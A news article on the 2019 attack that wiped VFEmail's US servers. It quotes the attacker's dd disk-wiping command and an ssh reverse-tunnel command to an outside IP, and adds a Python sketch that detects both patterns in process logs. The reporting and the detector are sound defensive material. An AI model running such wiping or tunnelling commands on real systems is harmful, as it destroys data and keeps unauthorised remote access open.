Hackers Wipe US Servers Of Email Provider VFEmail
Hackers have breached the servers of email provider VFEmail.net and wiped the data from all its US servers, destroying all US customers’ data in the process.
The attack took place yesterday, February 11, and was detected after the company’s site and webmail client went down without notice.
“At this time, the attacker has formatted all the disks on every server,” the company said yesterday. “Every VM is lost. Every file server is lost, every backup server is lost.”
“This was more than a multi-password via SSH exploit, and there was no ransom. Just attack and destroy,” VFEmail said.
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019
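The two commands quoted in the tweet map onto two detection rules for process-audit records: dd writing zeros onto a device node, and an ssh reverse forward that exposes the local sshd with host-key checking disabled. The sketch below is an added example, not code from VFEmail or the original article; the function names, rule names and result fields are assumptions.

```python
import re
import shlex

# The two command lines quoted in the tweet, as they would appear in exec logs.
TWEET_COMMANDS = [
    "dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559",
    "ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null"
    " aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N",
]
WIPE_SOURCES = {"/dev/zero", "/dev/urandom", "/dev/random"}
UNITS = {"": 1, "K": 1024, "M": 1024**2, "G": 1024**3}

def size(text, default):
    m = re.fullmatch(r"(\d+)([KMG]?)", (text or "").upper())
    return int(m.group(1)) * UNITS[m.group(2)] if m else default

def check_dd(argv):
    # Rule 1: dd copying zeros/random data straight onto a device node.
    kv = dict(a.split("=", 1) for a in argv[1:] if "=" in a)
    target = kv.get("of", "")
    if kv.get("if") not in WIPE_SOURCES or not target.startswith("/dev/") or target == "/dev/null":
        return None
    bs, count = size(kv.get("bs"), 512), size(kv.get("count"), None)
    return {"rule": "disk-wipe", "target": target,
            "offset": size(kv.get("seek"), 0) * bs,   # bytes skipped at start of device
            "bytes": None if count is None else count * bs}

def check_ssh(argv):
    # Rule 2: ssh -R reverse forward; record whether it targets port 22
    # and whether host-key verification was switched off.
    reverse, opts, it = [], {}, iter(argv[1:])
    for a in it:
        if a.startswith("-R"):
            reverse.append(a[2:] or next(it, ""))
        elif a.startswith("-o"):
            k, _, v = (a[2:] or next(it, "")).partition("=")
            opts[k.lower()] = v.lower()
    if not reverse:
        return None
    no_pin = opts.get("stricthostkeychecking") == "no" or opts.get("userknownhostsfile") == "/dev/null"
    return {"rule": "ssh-reverse-tunnel", "forwards": reverse, "host_key_check_disabled": no_pin,
            "exposes_sshd": any(r.rsplit(":", 1)[-1] == "22" for r in reverse)}

def scan(lines):
    checks = {"dd": check_dd, "ssh": check_ssh}
    results = (checks.get(a[0].rsplit("/", 1)[-1], lambda _: None)(a)
               for a in map(shlex.split, lines) if a)
    return [r for r in results if r]
```

Run over the tweet's commands, the dd rule reports a write starting 4 GiB into /dev/da0 and covering 1,675,871,911,936 bytes (about 1.5 TiB).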
The company’s staff is now working to recover user emails, but as things stand right now, all data for US customers appears to have been deleted for good and gone into /dev/null.
The company’s website is now back online, but its secondary domains are still down, such as chewiemail.com, clovermail.net, mail-on.us, manlymail.net, metadatamitigator.com, offensivelytolerant.com, openmail.cc, powdermail.com, and toothandmail.com.
US users accessing their respective VFEmail accounts will be greeted by empty inboxes. Users who can’t access their inboxes are advised to send themselves an email, according to an explanation on the company’s site.
There is also no spam filtering in place, but this is most likely going to be the last thing on the minds of VFEmail users, seeing that many have most likely lost sensitive information that they had backed up in their inboxes.
A VFEmail spokesperson was not available for comment at the time of publication.
It is rare that hackers take steps to wipe out an entire company’s data. Most attacks usually end up with hackers using compromised servers for other attacks (like running botnets or hosting malware), or with hackers asking for a ransom payment from hacked victims.
The largest ransom payment known to date was made by Nayana, a South Korean web hosting company which dished out $1 million in Bitcoin after hackers breached its network and ran the Linux-based Erebus ransomware that encrypted data on thousands of customers’ servers.
Back in November 2015, VFEmail was one of the many online email providers that were targeted by Armada Collective, a group of hackers who demanded ransom payments from victim companies to stop ongoing DDoS attacks [1, 2].
In June 2014, Infrastructure-as-a-Service provider Code Spaces was forced to shut down after hackers similarly breached and wiped its servers.